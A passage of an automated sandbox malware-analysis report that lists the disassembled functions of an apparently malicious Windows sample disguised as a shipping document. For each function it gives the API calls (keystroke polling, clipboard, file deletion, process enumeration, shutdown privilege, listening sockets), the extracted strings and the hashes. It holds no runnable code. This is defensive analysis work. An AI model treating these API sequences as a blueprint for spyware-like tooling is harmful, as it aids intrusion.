[:<:]], xrefs: 00687D1D

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
API String ID: 2102423945-2023335898
Opcode ID: 5825c1481beb1afebb1bafd684606f64c6f450d226ac731f7d598ca1bc163a2d
Instruction ID: c06d5ee81841a8fcef250dd9490a4ddc6a471c1d203c7d1dae184aaadc07e56c
Opcode Fuzzy Hash: 5825c1481beb1afebb1bafd684606f64c6f450d226ac731f7d598ca1bc163a2d
Instruction Fuzzy Hash: 2C82AE71D04219DFCB24DF98C8807EDBBB2BF48310F2582A9D959AB391E7749D81CB90

Function 006D091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 006D09DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 006D09EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 006D09FB
__wsplitpath.LIBCMT ref: 006D0A59
_wcscat.LIBCMT ref: 006D0A71
_wcscat.LIBCMT ref: 006D0A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006D0A98
SetCurrentDirectoryW.KERNEL32(?), ref: 006D0AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 006D0ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 006D0AFF
_wcscpy.LIBCMT ref: 006D0B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 006D0B4A

Strings

*.*, xrefs: 006D0B05

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 65e1c3cabfa934936b991bb1b858d7e7406cbebc4b3d846432db5c1b4b28c62d
Instruction ID: 3e27e261946ba6cdee233ddb2e5e24c7a3004c7067a993ce4cd62e04f2e582c2
Opcode Fuzzy Hash: 65e1c3cabfa934936b991bb1b858d7e7406cbebc4b3d846432db5c1b4b28c62d
Instruction Fuzzy Hash: F96177725083059FD750EF60C850AAEB3EAFF89310F04891EF98987352DB35EA45CB96

Function 006BA66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 006BABD7
Part of subcall function 006BABBB: GetLastError.KERNEL32(?,006BA69F,?,?,?), ref: 006BABE1
Part of subcall function 006BABBB: GetProcessHeap.KERNEL32(00000008,?,?,006BA69F,?,?,?), ref: 006BABF0
Part of subcall function 006BABBB: HeapAlloc.KERNEL32(00000000,?,006BA69F,?,?,?), ref: 006BABF7
Part of subcall function 006BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 006BAC0E

Part of subcall function 006BAC56: GetProcessHeap.KERNEL32(00000008,006BA6B5,00000000,00000000,?,006BA6B5,?), ref: 006BAC62
Part of subcall function 006BAC56: HeapAlloc.KERNEL32(00000000,?,006BA6B5,?), ref: 006BAC69
Part of subcall function 006BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,006BA6B5,?), ref: 006BAC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006BA6D0
_memset.LIBCMT ref: 006BA6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006BA704
GetLengthSid.ADVAPI32(?), ref: 006BA715
GetAce.ADVAPI32(?,00000000,?), ref: 006BA752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006BA76E
GetLengthSid.ADVAPI32(?), ref: 006BA78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006BA79A
HeapAlloc.KERNEL32(00000000), ref: 006BA7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 006BA7C2
CopySid.ADVAPI32(00000000), ref: 006BA7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006BA7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006BA820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 006BA834

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: d84bf9f7e5e4721e351a7942060b103f87287782fac7fc3aa89bc03e84f1d2f5
Instruction ID: 1ef9b0315da92705a460869ef71949bbe900118c21374c795d94a1a8c4617e73
Opcode Fuzzy Hash: d84bf9f7e5e4721e351a7942060b103f87287782fac7fc3aa89bc03e84f1d2f5
Instruction Fuzzy Hash: 5E513AB1900209EBDF14DFE5DC45AEEBBBAFF04300F048269E915A6290DB399E45CB65

Function 00686F07 Relevance: 20.9, Strings: 16, Instructions: 883COMMON

Download Yara Rule

Strings

BSR_UNICODE), xrefs: 00702EBA
LF), xrefs: 00702E26
NO_AUTO_POSSESS), xrefs: 00702CB0
UTF16), xrefs: 00702C56
BSR_ANYCRLF), xrefs: 00702EA0
UCP), xrefs: 00702C8F
rrr r, xrefs: 00687096, 0068709C
ANYCRLF), xrefs: 00702E7D
LIMIT_RECURSION=, xrefs: 00702D7E
CRLF), xrefs: 00702E43
LIMIT_MATCH=, xrefs: 00702CF2
CR), xrefs: 00702E09
NO_START_OPT), xrefs: 00702CD1
r, xrefs: 00686F77
UTF), xrefs: 00702C7C
ANY), xrefs: 00702E60

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID:
String ID: r$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$rrr r
API String ID: 0-4259963397
Opcode ID: 4e31c27699b9a58cb78c46826c49d206a00ded3fc2956377d1171f9e31a85dc9
Instruction ID: fd27a3e0407024a10677761acaa067053a1df1ac8559b1a3e9d59c7faedef405
Opcode Fuzzy Hash: 4e31c27699b9a58cb78c46826c49d206a00ded3fc2956377d1171f9e31a85dc9
Instruction Fuzzy Hash: E4728071E04219DBDB24DF58C8447AEB7F6FF08310F24826AE905EB281EB749E41DB94

Function 006C63F9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006C5FA6,?), ref: 006C6ED8

Part of subcall function 006C72CB: GetFileAttributesW.KERNEL32(?,006C6019), ref: 006C72CC

_wcscat.LIBCMT ref: 006C6441
__wsplitpath.LIBCMT ref: 006C645F
FindFirstFileW.KERNEL32(?,?), ref: 006C6474
_wcscpy.LIBCMT ref: 006C64A3
_wcscat.LIBCMT ref: 006C64B8
_wcscat.LIBCMT ref: 006C64CA
DeleteFileW.KERNEL32(?), ref: 006C64DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 006C64EB
FindClose.KERNEL32(00000000), ref: 006C6506

Strings

\*.*, xrefs: 006C643B
p1#v`K$v, xrefs: 006C64DA

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*$p1#v`K$v
API String ID: 2643075503-1732502266
Opcode ID: 7fdc32aafdfcd995ccf1309141414d9cf32b46be916696bfbfdfb3af2bb1020c
Instruction ID: 06832f1d3cad48d015c6892fe543d40a6c95376b736072321e24ed03d1beadfd
Opcode Fuzzy Hash: 7fdc32aafdfcd995ccf1309141414d9cf32b46be916696bfbfdfb3af2bb1020c
Instruction Fuzzy Hash: 0E31B8B24083849AD321EBE4C885EEB77DDAF56310F40491EF5D5C3141EA35D90987AB

Function 006E31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 006E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006E2BB5,?,?), ref: 006E3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006E328E

Part of subcall function 0068936C: __swprintf.LIBCMT ref: 006893AB
Part of subcall function 0068936C: __itow.LIBCMT ref: 006893DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 006E332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006E33C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 006E3604
RegCloseKey.ADVAPI32(00000000), ref: 006E3611

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: c126cd31971c90f374b21b2c078c1f51c890bb471c7531eb81de9b1a231da92b
Instruction ID: 070a7e512e1765e17f40ac5e2d806014e0cf9eba633893a33e0379c46bf548a1
Opcode Fuzzy Hash: c126cd31971c90f374b21b2c078c1f51c890bb471c7531eb81de9b1a231da92b
Instruction Fuzzy Hash: D1E16A31605310AFCB11DF29C995E6ABBEAEF88710B04896DF44ADB3A1DB30ED01CB55

Function 006C2B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 006C2B5F
GetAsyncKeyState.USER32(000000A0), ref: 006C2BE0
GetKeyState.USER32(000000A0), ref: 006C2BFB
GetAsyncKeyState.USER32(000000A1), ref: 006C2C15
GetKeyState.USER32(000000A1), ref: 006C2C2A
GetAsyncKeyState.USER32(00000011), ref: 006C2C42
GetKeyState.USER32(00000011), ref: 006C2C54
GetAsyncKeyState.USER32(00000012), ref: 006C2C6C
GetKeyState.USER32(00000012), ref: 006C2C7E
GetAsyncKeyState.USER32(0000005B), ref: 006C2C96
GetKeyState.USER32(0000005B), ref: 006C2CA8

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 51afbb717f04f8f857aca7b817464a8c42852691875343795bafe09ec4866d42
Instruction ID: 82039c41e6ef864191d913990ae1ef47bfe31875ab83e80bc8eb9a53d34e2c4d
Opcode Fuzzy Hash: 51afbb717f04f8f857aca7b817464a8c42852691875343795bafe09ec4866d42
Instruction Fuzzy Hash: B341C4305047CB69FF749B608824BF9BEA2EB11308F04805EDDC6563C1DBA89DD4C7A2

Function 006D6D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 006D6D2E
EmptyClipboard.USER32 ref: 006D6D34
GlobalAlloc.KERNEL32(00000002,?), ref: 006D6D49
CloseClipboard.USER32 ref: 006D6DE8

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 59c3df0a464bda865337f1029e262e0c2b761b1ae04e22ebc2485c3e645bec85
Instruction ID: d368e5b659d2226121921e39181d86a0f8141cc2990981210cab7fd5609d8e68
Opcode Fuzzy Hash: 59c3df0a464bda865337f1029e262e0c2b761b1ae04e22ebc2485c3e645bec85
Instruction Fuzzy Hash: 31217C31600210EFDB21AFA4EC59B6D77AAEF04710F04C11AF90ADB261CF39EC018B58

Function 006DC18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 006B9ABF: CLSIDFromProgID.OLE32 ref: 006B9ADC
Part of subcall function 006B9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 006B9AF7
Part of subcall function 006B9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 006B9B05
Part of subcall function 006B9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 006B9B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 006DC235
_memset.LIBCMT ref: 006DC242
_memset.LIBCMT ref: 006DC360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 006DC38C
CoTaskMemFree.OLE32(?), ref: 006DC397

Strings

NULL Pointer assignment, xrefs: 006DC3E5

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 7a30c4b35697e188c2fe63f7b0236f6bcd55dfd665c8cf24e2720384b543f0e3
Instruction ID: c573060d6a5da6ae2e89456ea682f8c11f4eb2bad243500b020cb87d4dc63c1a
Opcode Fuzzy Hash: 7a30c4b35697e188c2fe63f7b0236f6bcd55dfd665c8cf24e2720384b543f0e3
Instruction Fuzzy Hash: EA914C71D00219EBDB10EFA4DC95EEEBBBAEF04720F10811AF515A7281DB709A45CFA4

Function 006C79D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 006BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006BB180
Part of subcall function 006BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006BB1AD
Part of subcall function 006BB134: GetLastError.KERNEL32 ref: 006BB1BA

ExitWindowsEx.USER32(?,00000000), ref: 006C7A0F

Strings

SeShutdownPrivilege, xrefs: 006C79DD
, xrefs: 006C79FD
@, xrefs: 006C7A02

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: eb79815eae5256da77636293e175b1f722f4873491ef7e888f6344457138f417
Instruction ID: ef0a64ffd89bd1f06c34456eb3dec08e8e860611b8daa858e7cde96a2e139547
Opcode Fuzzy Hash: eb79815eae5256da77636293e175b1f722f4873491ef7e888f6344457138f417
Instruction Fuzzy Hash: C701F771658312AAF73C26F8CC4AFFF325ADB04340F14552CBD03A21D2DAA49E018AB4

Function 006D8C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006D8CA8
WSAGetLastError.WSOCK32(00000000), ref: 006D8CB7
bind.WSOCK32(00000000,?,00000010), ref: 006D8CD3
listen.WSOCK32(00000000,00000005), ref: 006D8CE2
WSAGetLastError.WSOCK32(00000000), ref: 006D8CFC
closesocket.WSOCK32(00000000,00000000), ref: 006D8D10

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: eff1e1c21f75f94d7f29c47235fd3c9c390ec908ddb7bfb4da72941f657588f5
Instruction ID: 43d09dfc35e8da94639d457861902a9db633d4d645af425b9aa9ffea0ffbdbed
Opcode Fuzzy Hash: eff1e1c21f75f94d7f29c47235fd3c9c390ec908ddb7bfb4da72941f657588f5
Instruction Fuzzy Hash: AC21D531A00200DFCB60EF64CD55B6E77AAEF48310F10825DF916A73D1CB349D018B55

Function 006C6532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006C6554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 006C6564
Process32NextW.KERNEL32(00000000,0000022C), ref: 006C6583
__wsplitpath.LIBCMT ref: 006C65A7
_wcscat.LIBCMT ref: 006C65BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 006C65F9

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 659ea3cb9f46aa0647589f8a82c3fca87bb26a55a6ea261e058d67acd4708da5
Instruction ID: d785c0677153b696e42fc0d35462ddc03e632871c33be2284130f213fd4e4d66
Opcode Fuzzy Hash: 659ea3cb9f46aa0647589f8a82c3fca87bb26a55a6ea261e058d67acd4708da5
Instruction Fuzzy Hash: B4218371900218ABDB20ABA4CC88FEDB7BDEB09300F6040A9F505E7241DB759F85CF65

Function 00689B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00689ED4
VUUU, xrefs: 00689EA7
r, xrefs: 00689CF3
VUUU, xrefs: 0070BE14
VUUU, xrefs: 00689E95
ERCP, xrefs: 00689C32

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU$r
API String ID: 0-567933833
Opcode ID: d28cd8216ae3017344488f8148730be5969fee9bf94f57160dbdb3a0ca706950
Instruction ID: c0d921410addd8fcbe6860ddab7e7132057f9021041a101a6b4e1d586e44902c
Opcode Fuzzy Hash: d28cd8216ae3017344488f8148730be5969fee9bf94f57160dbdb3a0ca706950
Instruction Fuzzy Hash: 42927E71A0021ACBEF25DF98C8507FDB7B2BB54314F18839AE915AB380D7759E81CB91

Function 006C13CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 006C13DC

Strings

,2s, xrefs: 006C16B1
(, xrefs: 006C1422
<2s, xrefs: 006C16FA
|, xrefs: 006C140C

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: lstrlen
String ID: ($,2s$<2s$|
API String ID: 1659193697-870431712
Opcode ID: 0e7b5947350297ea4d5aa699de15e372e152017c1b54f09b94ebb27f0f2c9cfb
Instruction ID: c8f395ffd00b63fb113c997c68e7c94471ab629e18769a3ddb911072f28d1ed9
Opcode Fuzzy Hash: 0e7b5947350297ea4d5aa699de15e372e152017c1b54f09b94ebb27f0f2c9cfb
Instruction Fuzzy Hash: E7322575A006059FCB28CF69C480EAAB7F1FF49320B15C56EE59ADB3A2D770E941CB44

Function 006D923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 006DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 006DA84E

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 006D9296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 006D92B9

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: a7e77ddbabac71554fcdd5538069cf20d019ce9b955aacfc9afe50c5a4de64ad
Instruction ID: dde09487dc26a5d1e3bfb27fdf883134ca251744bf447738ccec56342b1dd1f3
Opcode Fuzzy Hash: a7e77ddbabac71554fcdd5538069cf20d019ce9b955aacfc9afe50c5a4de64ad
